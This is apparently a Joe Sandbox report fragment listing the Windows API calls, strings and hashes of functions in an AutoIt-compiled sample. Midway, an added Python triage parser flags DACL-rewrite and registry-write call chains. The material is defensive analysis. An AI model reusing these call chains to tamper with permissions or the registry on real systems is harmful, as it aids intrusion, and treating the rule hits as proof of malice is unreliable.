                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                            • API String ID: 1256254125-909552448
                                                                                                            • Opcode ID: 776c782057da52feda84552c75ad20d10b4a92d9d83111ec164f6c6c494e87b8
                                                                                                            • Instruction ID: d9a6b57e1e77be1e2f893d0cf74ff46de12344e76285bd364940db5d9d81afe6
                                                                                                            • Opcode Fuzzy Hash: 776c782057da52feda84552c75ad20d10b4a92d9d83111ec164f6c6c494e87b8
                                                                                                            • Instruction Fuzzy Hash: AC71D53262056B8BCB20DE6CCD515BE33A1ABA0754F19252BFC95A7384E631CD85C7B0
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00DE835A
                                                                                                            • _wcslen.LIBCMT ref: 00DE836E
                                                                                                            • _wcslen.LIBCMT ref: 00DE8391
                                                                                                            • _wcslen.LIBCMT ref: 00DE83B4
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DE83F2
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00DE361A,?), ref: 00DE844E
                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DE8487
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DE84CA
                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DE8501
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00DE850D
                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DE851D
                                                                                                            • DestroyIcon.USER32(?), ref: 00DE852C
                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DE8549
                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DE8555
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                            • API String ID: 799131459-1154884017
                                                                                                            • Opcode ID: 8bde118d8c1c19b4ec64747a4854570b9039fa660f9b99ac6deccc17ecd3be33
                                                                                                            • Instruction ID: 72595e7b58b654cddaa654bad388957887a496b921aa3e90f041af0b3d045eac
                                                                                                            • Opcode Fuzzy Hash: 8bde118d8c1c19b4ec64747a4854570b9039fa660f9b99ac6deccc17ecd3be33
                                                                                                            • Instruction Fuzzy Hash: 1561CE71540745BAEB14EF65CC81BBE77A8FB04B21F104609F919EA1D1EF74A980DBB0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                            • API String ID: 0-1645009161
                                                                                                            • Opcode ID: e3a7e702dab6e65170fc476126e70a1e0e725db6debdcd0b61ab790da883bf36
                                                                                                            • Instruction ID: 9321446d3bade7f7f509917f995ae808591408aa9ec44d4dc25b6ad9af8b6762
                                                                                                            • Opcode Fuzzy Hash: e3a7e702dab6e65170fc476126e70a1e0e725db6debdcd0b61ab790da883bf36
                                                                                                            • Instruction Fuzzy Hash: 23811971A40605BBDF11AF60FC42FAE37A4EF15301F244024FC05AA196EB71DA19C7B1
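The function entries above with the user-object DACL rewrite (GetUserObjectSecurity, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity), the registry write paired with the REG_* type names, and the #include/#requireadmin directive strings are exactly what a triage script should pull out of a listing like this without a human scrolling through it. The Python parser below is an added example written for this page; it is not Joe Sandbox's code and not part of the sample. It reads the "• Name.MODULE(args), ref: ADDR" lines (including the "Part of subcall function" ones), the "String ID" list and the Instruction Fuzzy Hash of each entry, checks a few ordered call chains, and decodes the dwType argument of RegSetValueExW with the winnt.h constants. The sample input is constructed from lines of this report, trimmed to three entries; the rule names and thresholds are the editor's choices. One caveat a reader should keep in mind: all three routines are consistent with built-in functions of the AutoIt interpreter (the report already classifies the sample as a compiled AutoIt script, and the directive and "Bad directive syntax error" strings belong to the interpreter's own script parser), so a hit on these rules says the AutoIt runtime is present in the dump, not that the embedded script exercises that code; what the script actually does has to come from the extracted script or the dynamic trace.

```python
import re
from dataclasses import dataclass, field
# Constructed input: lines copied from this report's listing, trimmed to three entries.
SAMPLE_REPORT = """\
APIs
• Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DB0DF5
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DB0E96
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DB0F35
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DB0F47
Similarity
• String ID:
• Instruction Fuzzy Hash: 03713C71A0430AEBDB209FA4DC45BEFBBB8BF09350F184155F91AE6251D7719905CB70
APIs
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00DECC08,00000000,?,00000000,?,?), ref: 00DDC544
• _wcslen.LIBCMT ref: 00DDC5F4
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DDC6B2
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DDC84D
Similarity
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• Instruction Fuzzy Hash: 481268356142019FDB14DF14C891E2AB7E5EF88725F18885DF88A9B3A2DB31FC45CBA1
Similarity
• String ID: "$#OnAutoItStartRegister$#include$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error
• Instruction Fuzzy Hash: 23811971A40605BBDF11AF60FC42FAE37A4EF15301F244024FC05AA196EB71DA19C7B1
"""
CALL_RE = re.compile(
    r"^• (?:Part of subcall function ([0-9A-F]+): )?"
    r"([A-Za-z_]\w*)\.[A-Z0-9]+(?:\((.*)\))?,? ref: ([0-9A-F]+)$")

@dataclass
class Call:
    name: str
    ref: int                    # call-site address
    args: str                   # raw argument list, '?' = not recovered by the plugin
    subcall_of: "int | None"    # parent address for 'Part of subcall function' lines

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fuzzy_hash: str = ""
    def direct_calls(self):
        return [c.name for c in self.calls if c.subcall_of is None]

def parse_entries(text):
    """One FunctionEntry per block; the 'Instruction Fuzzy Hash' line closes a block."""
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()                       # the listing is deeply indented
        m = CALL_RE.match(line)
        if m:
            parent, name, args, ref = m.groups()
            cur.calls.append(Call(name, int(ref, 16), args or "",
                                  int(parent, 16) if parent else None))
        elif line.startswith("• String ID:"):
            cur.strings = [s.strip() for s in line[12:].split("$") if s.strip()]
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
            entries.append(cur)
            cur = FunctionEntry()
    return entries

def has_ordered_chain(sequence, chain):
    """True if `chain` occurs in `sequence` as a subsequence (other calls may sit between)."""
    it = iter(sequence)
    return all(any(name == want for name in it) for want in chain)

@dataclass
class Rule:
    name: str
    chain: tuple = ()                  # ordered subsequence required among direct calls
    any_api: frozenset = frozenset()   # at least one of these anywhere, subcalls included
    strings: frozenset = frozenset()   # at least min_strings of these in the String ID list
    min_strings: int = 1
    def matches(self, e):
        if self.chain and not has_ordered_chain(e.direct_calls(), self.chain):
            return False
        if self.any_api and not self.any_api & {c.name for c in e.calls}:
            return False
        return not self.strings or len(self.strings & set(e.strings)) >= self.min_strings

RULES = [
    Rule("user-object DACL rewrite", any_api=frozenset({"GetUserObjectSecurity"}),
         chain=("GetSecurityDescriptorDacl", "AddAce", "SetSecurityDescriptorDacl",
                "SetUserObjectSecurity")),
    Rule("registry value write", chain=("RegCreateKeyExW", "RegSetValueExW")),
    Rule("AutoIt interpreter directive parser", min_strings=2,
         strings=frozenset({"#OnAutoItStartRegister", "#requireadmin", "#pragma compile"})),
]
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD",
             7: "REG_MULTI_SZ", 11: "REG_QWORD"}   # dwType constants from winnt.h

def reg_value_types(e):
    """Decode the dwType (4th of six) argument of each RegSetValueExW call that was recovered."""
    types = [c.args.split(",")[3] for c in e.calls if c.name == "RegSetValueExW"]
    return [REG_TYPES.get(int(t, 16), "unknown") for t in types if t != "?"]

def triage(text, rules=RULES):
    """[(fuzzy-hash prefix, [matched rule names]), ...] in listing order."""
    return [(e.fuzzy_hash[:16], [r.name for r in rules if r.matches(e)])
            for e in parse_entries(text)]
```

Feed it the whole listing rather than the trimmed sample (the parser strips the indentation itself); the per-entry fuzzy-hash prefix then gives a key for lining up the same function across two reports of this family, and the ordered-chain check is what keeps a routine that merely reads a DACL from being confused with one that rewrites it.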
                                                                                                            APIs
                                                                                                            • LoadIconW.USER32(00000063), ref: 00DB5A2E
                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DB5A40
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00DB5A57
                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00DB5A6C
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00DB5A72
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00DB5A82
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00DB5A88
                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DB5AA9
                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DB5AC3
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DB5ACC
                                                                                                            • _wcslen.LIBCMT ref: 00DB5B33
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00DB5B6F
                                                                                                            • GetDesktopWindow.USER32 ref: 00DB5B75
                                                                                                            • GetWindowRect.USER32(00000000), ref: 00DB5B7C
                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DB5BD3
                                                                                                            • GetClientRect.USER32(?,?), ref: 00DB5BE0
                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00DB5C05
                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DB5C2F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 895679908-0
                                                                                                            • Opcode ID: fdf17654ef31956a67365058dbbcb20e5fb294207b8718726852aed950ab28d1
                                                                                                            • Instruction ID: 1b40c2f44feb6ac415a174b5a515e8ec2c49d6f22a8a6d1083b38ea42b11f207
                                                                                                            • Opcode Fuzzy Hash: fdf17654ef31956a67365058dbbcb20e5fb294207b8718726852aed950ab28d1
                                                                                                            • Instruction Fuzzy Hash: D4717C31900B05EFDB20EFA8DE85BAEBBF5FF48704F144518E586A66A4D771E940CB24
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                                                                                            • API String ID: 176396367-1901692981
                                                                                                            • Opcode ID: 4d46d4fd19ab8d8112129052a71b82fa6de0cbf2f3985ba1c2d210d0cb5d8bfd
                                                                                                            • Instruction ID: 46aa1555892507f9373a259e82ed7062b465e7ff373320cb565a8e3d9b5aa79f
                                                                                                            • Opcode Fuzzy Hash: 4d46d4fd19ab8d8112129052a71b82fa6de0cbf2f3985ba1c2d210d0cb5d8bfd
                                                                                                            • Instruction Fuzzy Hash: DEE19832A00616EBCB15DF78C451AEEBBB4FF54750F588119E457B7240DB309E89ABB0
                                                                                                            APIs
                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D700C6
                                                                                                              • Part of subcall function 00D700ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00E2070C,00000FA0,0A0CC637,?,?,?,?,00D923B3,000000FF), ref: 00D7011C
                                                                                                              • Part of subcall function 00D700ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D923B3,000000FF), ref: 00D70127
                                                                                                              • Part of subcall function 00D700ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D923B3,000000FF), ref: 00D70138
                                                                                                              • Part of subcall function 00D700ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D7014E
                                                                                                              • Part of subcall function 00D700ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D7015C
                                                                                                              • Part of subcall function 00D700ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D7016A
                                                                                                              • Part of subcall function 00D700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D70195
                                                                                                              • Part of subcall function 00D700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D701A0
                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00D700E7
                                                                                                              • Part of subcall function 00D700A3: __onexit.LIBCMT ref: 00D700A9
                                                                                                            Strings
                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D70122
                                                                                                            • SleepConditionVariableCS, xrefs: 00D70154
                                                                                                            • kernel32.dll, xrefs: 00D70133
                                                                                                            • InitializeConditionVariable, xrefs: 00D70148
                                                                                                            • WakeAllConditionVariable, xrefs: 00D70162
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                            • API String ID: 66158676-1714406822
                                                                                                            • Opcode ID: 55510a31d039838e884e538f6c7facf585739b782db2350a78eeca334a2c86f4
                                                                                                            • Instruction ID: 7929222bd00150e70c92e849d600821b0215df349e5ad0bcd1a31f2cd4ae117c
                                                                                                            • Opcode Fuzzy Hash: 55510a31d039838e884e538f6c7facf585739b782db2350a78eeca334a2c86f4
                                                                                                            • Instruction Fuzzy Hash: 8C210B32A44750EFD7217B65AC45B6A3F94DB04B61F04813AFC09E67D2EBB09C048AB0
                                                                                                            APIs
                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,00DECC08), ref: 00DC4527
                                                                                                            • _wcslen.LIBCMT ref: 00DC453B
                                                                                                            • _wcslen.LIBCMT ref: 00DC4599
                                                                                                            • _wcslen.LIBCMT ref: 00DC45F4
                                                                                                            • _wcslen.LIBCMT ref: 00DC463F
                                                                                                            • _wcslen.LIBCMT ref: 00DC46A7
                                                                                                              • Part of subcall function 00D6F9F2: _wcslen.LIBCMT ref: 00D6F9FD
                                                                                                            • GetDriveTypeW.KERNEL32(?,00E16BF0,00000061), ref: 00DC4743
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                            • Opcode ID: ce4709f1f118868e2b33418a414f0dfea2476836da0c93a31a31e4bc281230e4
                                                                                                            • Instruction ID: da0429a49520e76d5c8e7868fe44cda21db80f059cc566a7a04437517562d2b3
                                                                                                            • Opcode Fuzzy Hash: ce4709f1f118868e2b33418a414f0dfea2476836da0c93a31a31e4bc281230e4
                                                                                                            • Instruction Fuzzy Hash: 9CB1D2316083029FC710DF28C8A1EAAB7E5EFA5760F54491DF896C7295E730D845CBB2
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00DE9147
                                                                                                              • Part of subcall function 00DE7674: ClientToScreen.USER32(?,?), ref: 00DE769A
                                                                                                              • Part of subcall function 00DE7674: GetWindowRect.USER32(?,?), ref: 00DE7710
                                                                                                              • Part of subcall function 00DE7674: PtInRect.USER32(?,?,00DE8B89), ref: 00DE7720
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DE91B0
                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DE91BB
                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DE91DE
                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DE9225
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DE923E
                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00DE9255
                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00DE9277
                                                                                                            • DragFinish.SHELL32(?), ref: 00DE927E
                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DE9371
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                                                                                                            • API String ID: 221274066-136824727
                                                                                                            • Opcode ID: d9d6be5f3b7174bfbc5cf450759a4f8e755ea2fc05264ec54205788d91adf2c4
                                                                                                            • Instruction ID: 87cf0b4c546ed22e644a2fcce2c9fcc858a7d8c85a309ef3aed44d2c44c13d83
                                                                                                            • Opcode Fuzzy Hash: d9d6be5f3b7174bfbc5cf450759a4f8e755ea2fc05264ec54205788d91adf2c4
                                                                                                            • Instruction Fuzzy Hash: BE618A71108341AFC701EF65DC95DAFBBE8EF88750F40091DF995962A1DB309A49CB72
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00DDB198
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB1B0
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB1D4
                                                                                                            • _wcslen.LIBCMT ref: 00DDB200
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB214
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB236
                                                                                                            • _wcslen.LIBCMT ref: 00DDB332
                                                                                                              • Part of subcall function 00DC05A7: GetStdHandle.KERNEL32(000000F6), ref: 00DC05C6
                                                                                                            • _wcslen.LIBCMT ref: 00DDB34B
                                                                                                            • _wcslen.LIBCMT ref: 00DDB366
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DDB3B6
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00DDB407
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DDB439
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDB44A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDB45C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDB46E
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DDB4E3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2178637699-0
                                                                                                            • Opcode ID: fe7d6c8966a9a02b62c6f0f96c5e08934b76ec47c47359ecea3a9909ccafe0f9
                                                                                                            • Instruction ID: 91b6a5b14b429dea4d82e3b1ff5a32039fa009c4d5f84460b072fff744b1738f
                                                                                                            • Opcode Fuzzy Hash: fe7d6c8966a9a02b62c6f0f96c5e08934b76ec47c47359ecea3a9909ccafe0f9
                                                                                                            • Instruction Fuzzy Hash: A0F14931504340DFCB14EF24C891A6ABBE5EF85328F19855EF8959B2A2DB31EC45CB72
                                                                                                            APIs
                                                                                                            • GetMenuItemCount.USER32(00E21990), ref: 00D92F8D
                                                                                                            • GetMenuItemCount.USER32(00E21990), ref: 00D9303D
                                                                                                            • GetCursorPos.USER32(?), ref: 00D93081
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00D9308A
                                                                                                            • TrackPopupMenuEx.USER32(00E21990,00000000,?,00000000,00000000,00000000), ref: 00D9309D
                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D930A9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 36266755-4108050209
                                                                                                            • Opcode ID: be6e7e0b8367129455735ae4fd6b0e4957078997a84587a160b6c6804fe3756f
                                                                                                            • Instruction ID: 823d3672551926ac06fe1de43ed249cfe2c7a97f7f32d16d5ba08935648e4f1c
                                                                                                            • Opcode Fuzzy Hash: be6e7e0b8367129455735ae4fd6b0e4957078997a84587a160b6c6804fe3756f
                                                                                                            • Instruction Fuzzy Hash: 0A712930640345BEEF219F65CC89FAABF64FF04364F244216F919AA1E0C7B1A914CB70
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,?), ref: 00DE6DEB
